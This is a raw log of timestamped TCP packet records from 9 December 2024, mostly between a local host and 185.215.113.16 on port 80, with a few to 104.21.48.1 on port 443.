                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.771780968 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.772464991 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.772512913 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.772559881 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.772597075 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.774539948 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.774584055 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.774591923 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.774604082 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.774627924 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.774652958 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.774749994 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.774835110 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.775650024 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.775692940 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.776024103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.776772022 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.776828051 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.776830912 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.776868105 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.777889967 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.778074026 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.778100967 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.778115034 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.778979063 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.779150009 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.779171944 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.779238939 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.779964924 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.780127048 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.780174017 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.781124115 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.781389952 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.781451941 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.782125950 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.782176018 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.782475948 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.782519102 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.783281088 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.783565044 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.783616066 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.784301996 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.784451962 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.784523010 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.784523010 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.785445929 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.785752058 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.786036968 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.786505938 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.786554098 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.786952972 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.787116051 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.787633896 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.787933111 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.787992001 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.788645983 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.788727045 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.923856020 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.923980951 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.924007893 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.924062014 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.924453020 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.924530983 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.924556017 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.924606085 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.925594091 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.925726891 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.925798893 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.925843000 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.926561117 CET44349979104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.926609993 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.926628113 CET49979443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.926654100 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.926785946 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.926831007 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.927684069 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.927926064 CET49979443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.927932978 CET44349979104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.927956104 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.928174019 CET44349979104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.928400993 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.928538084 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.928836107 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.928924084 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.928968906 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.929465055 CET49979443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.929569006 CET49979443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.929598093 CET44349979104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.929913044 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.929965973 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.930057049 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.930100918 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.930927992 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.930988073 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.931097031 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.931226969 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.932032108 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.933028936 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.933031082 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.933146000 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.933168888 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.933185101 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.933232069 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.934221983 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.934343100 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.934354067 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.934490919 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.935300112 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.935348988 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.935378075 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.935441017 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.936414003 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.936598063 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.936649084 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.937452078 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.937944889 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.938075066 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.938163996 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.938858986 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.938914061 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.939090014 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.939331055 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.939809084 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.940223932 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.940289974 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.940660954 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.940817118 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.941028118 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.941756964 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.941811085 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.942182064 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.942236900 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.942832947 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.942886114 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.943047047 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.943401098 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.943933964 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.943984985 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.944010973 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.944048882 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.945019960 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.945137024 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.945183992 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.946160078 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.946302891 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.946353912 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.947249889 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.947299004 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.947336912 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.947374105 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.948265076 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.948545933 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.948606968 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.949408054 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.949460983 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.949806929 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.949863911 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.950406075 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.950465918 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.950748920 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.950800896 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.951500893 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.951562881 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.951844931 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.951908112 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.952590942 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.952729940 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.952913046 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.952966928 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.953711987 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.953766108 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.953942060 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.954344034 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.954747915 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.954793930 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.954886913 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.954932928 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.955806017 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.955848932 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.955931902 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.956412077 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.956887007 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.956931114 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.957082033 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.958071947 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.958142996 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.958547115 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.958599091 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.959067106 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.959115982 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.959551096 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.959763050 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.960177898 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.960220098 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.960491896 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.960860968 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.961251020 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.961726904 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.961787939 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.962431908 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.962481022 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.962637901 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.962688923 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.963489056 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.963546038 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.963820934 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.963866949 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.964488029 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.964548111 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.964657068 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.964862108 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.965574980 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.965622902 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.965914011 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.966001987 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.966679096 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.967170000 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.967220068 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.967708111 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.967761040 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.967905045 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.967953920 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.968839884 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.968894958 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.969063997 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.969183922 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.969906092 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.969947100 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.970057011 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.970463991 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.970973969 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.971015930 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.971276045 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.971335888 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.972050905 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.972093105 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.972400904 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.972438097 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.973170042 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.973270893 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.973381042 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.973503113 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.974226952 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.974275112 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.974567890 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.974617004 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.975295067 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.975435019 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.975739956 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.976135015 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.976399899 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.976452112 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.976823092 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.976880074 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.977480888 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.977679014 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.977751970 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.978528976 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.978610992 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.978768110 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.979204893 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.979605913 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.979662895 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.979935884 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.979985952 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.980813026 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.980884075 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.116060972 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.116179943 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.116234064 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.116565943 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.116605043 CET4996980192.168.2.6185.215.113.16
